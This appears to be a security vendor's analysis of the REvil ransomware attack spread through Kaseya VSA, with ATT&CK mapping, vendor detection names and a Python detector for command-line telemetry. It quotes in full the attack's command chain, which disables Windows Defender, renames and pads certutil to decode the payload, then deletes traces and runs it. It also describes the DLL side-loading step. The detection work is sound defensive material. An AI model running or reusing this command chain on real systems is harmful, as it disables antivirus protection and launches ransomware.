The REvil group, which is assumed to be behind the attacks, used Kaseya’s supply chain to distribute the ransomware efficiently. During the infection process it used legitimate Microsoft files to neutralize Windows Defender and bypass anti-malware solutions, then encrypted files discreetly.
The detailed infection information is as follows.
- Initial Access: Supply Chain Compromise (TID: T1195)
Exploits a vulnerability in Kaseya VSA to create the agent.crt file (a base64-encoded file) in the C:\kworking folder
- Execution: Command and Scripting Interpreter (TID: T1059)
Executes a PowerShell command by running Kaseya’s AgentMon.exe
- Defense Evasion: Impair Defenses (TID: T1562) & Masquerading (TID: T1036) & Obfuscated Files or Information (TID: T1027) & Indicator Removal on Host (TID: T1070)
“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
When this PowerShell command is executed, AhnLab’s anti-malware product V3 can detect the ransomware in advance through its behavior detection feature, under the detection alias Execution/MDP.Behavior.M3792. The components of the command are explained below:
- DisableRealtimeMonitoring: Disables Windows Defender’s real-time protection
- DisableIntrusionPreventionSystem: Disables Windows Defender’s download file scanning
- DisableScriptScanning: Disables Windows Defender’s script scanning
- EnableControlledFolderAccess Disabled: Allows access to controlled folders
- EnableNetworkProtection AuditMode -Force: Disables network protection mode (audit only)
- MAPSReporting Disabled: Disables Microsoft Active Protection Service reporting
- SubmitSamplesConsent NeverSend: Disables Windows Defender’s automatic sample submission
- copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe: Copies the legitimate certutil.exe from the Windows path to cert.exe
- echo %RANDOM% >> C:\Windows\cert.exe: Appends a random value to the end of the copied cert.exe to bypass anti-malware detection of certutil.exe
- C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe: Decodes the obfuscated file created through the vulnerability (agent.crt → agent.exe)
- del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe: Deletes both the obfuscated file and the copied certutil.exe, then runs the decoded executable
- Persistence: Hijack Execution Flow (TID: T1574)
When executed, the exe file drops a legitimate Microsoft file (msmpeng.exe) and a DLL carrying the BlueCrab ransomware features (mpsvc.dll) into the %temp% folder. When msmpeng.exe runs, it calls ServiceCrtMain of mpsvc.dll. The DLL created by the attacker implements the ransomware features in that function, so the malicious behavior is performed by the legitimate msmpeng.exe process that loaded the DLL.
This sequence was likely chosen to bypass anti-malware detection by having the behavior originate from the legitimate msmpeng.exe process. Besides file detection, V3 products can detect the malware with the ‘process memory scan’ feature the moment the ransomware DLL module (mpsvc.dll) is executed. MDS and EDR products also detect BlueCrab ransomware operating in this way without any issue.
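As an added illustration that is not part of AhnLab’s report, the following Python checker flags the patterns from the command line above (Defender settings weakened via Set-MpPreference, certutil copied under a new name, padded, and used to decode a payload) in process command-line telemetry. The sample command lines are constructed for the example; the REvil one is the chain quoted in this report.

```python
import re

# Set-MpPreference settings from the observed command that weaken Defender. Each pattern
# requires the weakening value, so a benign "-DisableRealtimeMonitoring $false" is not flagged.
TAMPER_PATTERNS = [
    (r"-DisableRealtimeMonitoring\s+\$true", "real-time protection disabled"),
    (r"-DisableIntrusionPreventionSystem\s+\$true", "intrusion prevention disabled"),
    (r"-DisableIOAVProtection\s+\$true", "downloaded-file scanning disabled"),
    (r"-DisableScriptScanning\s+\$true", "script scanning disabled"),
    (r"-EnableControlledFolderAccess\s+Disabled", "controlled folder access disabled"),
    (r"-EnableNetworkProtection\s+AuditMode", "network protection reduced to audit mode"),
    (r"-MAPSReporting\s+Disabled", "MAPS reporting disabled"),
    (r"-SubmitSamplesConsent\s+NeverSend", "sample submission disabled"),
]
# certutil handling seen in the chain: copied under a new name, padded with echo, then used to decode.
COPY_CERTUTIL = re.compile(r"copy\s+(?:/Y\s+)?\S*certutil\.exe\s+(\S+)", re.I)
APPEND_TO_EXE = re.compile(r">>\s*(\S+\.exe)", re.I)
DECODE = re.compile(r"(\S+\.exe)\s+-decode\s+(\S+)\s+(\S+)", re.I)

def analyze_cmdline(cmdline):
    """Return findings for one process command line; an empty list means nothing suspicious."""
    findings = []
    if re.search(r"set-mppreference", cmdline, re.I):
        findings += ["defender_tamper: " + d for p, d in TAMPER_PATTERNS if re.search(p, cmdline, re.I)]
    if m := COPY_CERTUTIL.search(cmdline):
        findings.append("certutil_copied_to: " + m.group(1))
    if m := APPEND_TO_EXE.search(cmdline):
        findings.append("bytes_appended_to_exe: " + m.group(1))
    # A -decode run by a binary not named certutil is the renamed-copy case; plain certutil use is left alone here.
    if (m := DECODE.search(cmdline)) and "certutil" not in m.group(1).lower():
        findings.append(f"renamed_certutil_decode: {m.group(1)} {m.group(2)} -> {m.group(3)}")
    return findings

def verdict(cmdline):
    # "high" when Defender tampering and certutil abuse appear in the same command line.
    f = analyze_cmdline(cmdline)
    tamper = any(x.startswith("defender_tamper") for x in f)
    lolbin = any(not x.startswith("defender_tamper") for x in f)
    return "high" if tamper and lolbin else ("medium" if f else "none")

# Constructed samples: the chain from this report, a legitimate certutil decode, and a benign Defender change.
REVIL_CMD = (
    '"C:\\WINDOWS\\system32\\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
    'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference '
    '-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true '
    '-DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode '
    '-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & '
    'copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe & echo %RANDOM% >> C:\\Windows\\cert.exe & '
    'C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & '
    'del /q /f c:\\kworking\\agent.crt C:\\Windows\\cert.exe & c:\\kworking\\agent.exe'
)
ADMIN_CMD = "certutil.exe -decode C:\\certs\\server.b64 C:\\certs\\server.cer"
BENIGN_CMD = "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false"
```

Running `verdict(REVIL_CMD)` returns "high" with eleven findings, while the admin decode and the re-enabling Set-MpPreference call return "none".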
V3 Detection Status
- Data/BIN.EncPe (2021.07.03.03)
- Ransomware/Win.Sodinokibi (2021.07.03.03)
- Ransomware/Win.REvil (2021.07.03.03)
- Execution/MDP.Behavior.M3792 (Behavior Detection 2021.07.10.00)
- Ransomware/Win.BlueCrab.XM120 (Memory Scan 2021.07.09.03)
[EDR Product Detection Screen]
[MDS Product Detection Status]
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.